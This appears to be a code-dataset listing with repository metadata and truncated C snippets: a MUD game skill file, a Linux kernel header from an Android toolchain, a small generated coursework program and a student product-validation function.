ee17b8783aee4271ddb41192917cd8c705ddb379 | c8639e2b4bb7116d7dd66acaa769c30d7bb479f7 | /world/daemon/class/puti/qianjun-bang/wu.c | 2eec34c2e706d99b8715eba2b0152d132dc94716 | [] | no_license | ninemoon/mhxy2002 | 43bc9759bbde56e2c49c524514f3dc4f83fbe932 | 76e0fa31cd662864bd55168e2fdf986622ed510e | refs/heads/master | 2021-09-06T10:05:19.812948 | 2018-02-05T09:57:57 | 2018-02-05T09:57:57 | 120,064,608 | 0 | 0 | null | 2018-02-03T06:07:09 | 2018-02-03T06:07:08 | null | GB18030 | C | false | false | 9,043 | c | #include <ansi.h>
inherit SSERVER;
#include "/daemon/skill/eff_msg.h";
int perform2(object me, object target);
int perform3(object me, object target);
int perform(object me, object target)
{
object weapon1;
string msg;
int damage, p,time;
if( !target ) target = offensi... | [
"liming.xie@gmail.com"
] | liming.xie@gmail.com |
e53cfcc2ffea8b865548f092039d5c7fa652bcaa | dc298e43ec1521dbb4fe68288127ef32ef57ca6b | /core/src/overture/.deps/android-toolchain-21-arm/sysroot/usr/include/linux/pkt_cls.h | 113469c7b768d3a74820b4154f3ea009b424277e | [
"LicenseRef-scancode-generic-cla",
"MIT",
"NCSA",
"LicenseRef-scancode-arm-llvm-sga"
] | permissive | 1170762202/ShadowsocksDemo | ce1a599945a89b4aeb5a9f2afe8a6d035dc2e281 | d2f00c31724c71c4d5ca958a37fec00ef55512b9 | refs/heads/master | 2020-04-26T16:01:12.761746 | 2019-03-04T08:08:34 | 2019-03-04T08:08:34 | 173,664,896 | 7 | 3 | null | null | null | null | UTF-8 | C | false | false | 10,400 | h | /****************************************************************************
****************************************************************************
***
*** This header was automatically generated from a Linux kernel header
*** of the same name, to make information necessary for userspace to
*** call i... | [
"1170762202@qq.ccom"
] | 1170762202@qq.ccom |
f482d2cf5b8940d287b4d1e11cb21ca804c9143a | fd2837aef61176323fb6d8eb647b20debe7995f5 | /CSAPP/sa-bAbi/working/df089727fc.c | 05b3c1c1bb4d1603cf4c77da5591ff4061d7224d | [] | no_license | callMeBigBen/CourseWork | b0ef17b5cfe07ba61404abd68812d2b56393db87 | 41d68c07f7b1411dbca7dc7d5e2efeceb9edee27 | refs/heads/master | 2020-04-10T08:18:21.617984 | 2019-05-22T05:26:38 | 2019-05-22T05:26:38 | 160,902,512 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 499 | c | #include <stdlib.h> // Tag.OTHER
int main() // Tag.OTHER
{ // Tag.OTHER
int entity_0; // Tag.BODY
int* entity_9; // Tag.BODY
int* entity_5; // Tag.BODY
entity_9 = new int(rand()); // Tag.BODY
entit... | [
"33094628+callMeBigBen@users.noreply.github.com"
] | 33094628+callMeBigBen@users.noreply.github.com |
3aa53bacfd80e8eea9f2ba11bdb2847752f57f7f | ec78819541307aecce7b38dc8f3c711a595864cb | /Assignment 2&3/validation/product_validator.c | e895a2d3cc5608a87b9e06405a0f7c55ab9db4a0 | [] | no_license | BVlad917/Object-Oriented-Programming | 8c35fcd48a6e4cdddd596718b488480681ec719b | 2506bd59e2e3c2b04a7c551ac329ac00256f9835 | refs/heads/main | 2023-07-28T23:22:22.287290 | 2021-09-20T19:54:23 | 2021-09-20T19:54:23 | 408,197,159 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 718 | c | //
// Created by VladB on 07-Mar-21.
//
#include <string.h>
#include "product_validator.h"
#include "date_validator.h"
int validate_product(Product *p) {
int error = 1, category;
double quantity;
if (strlen(get_product_name(p)) == 0) {
error *= 3;
}
category = get_product_c... | [
"noreply@github.com"
] | BVlad917.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.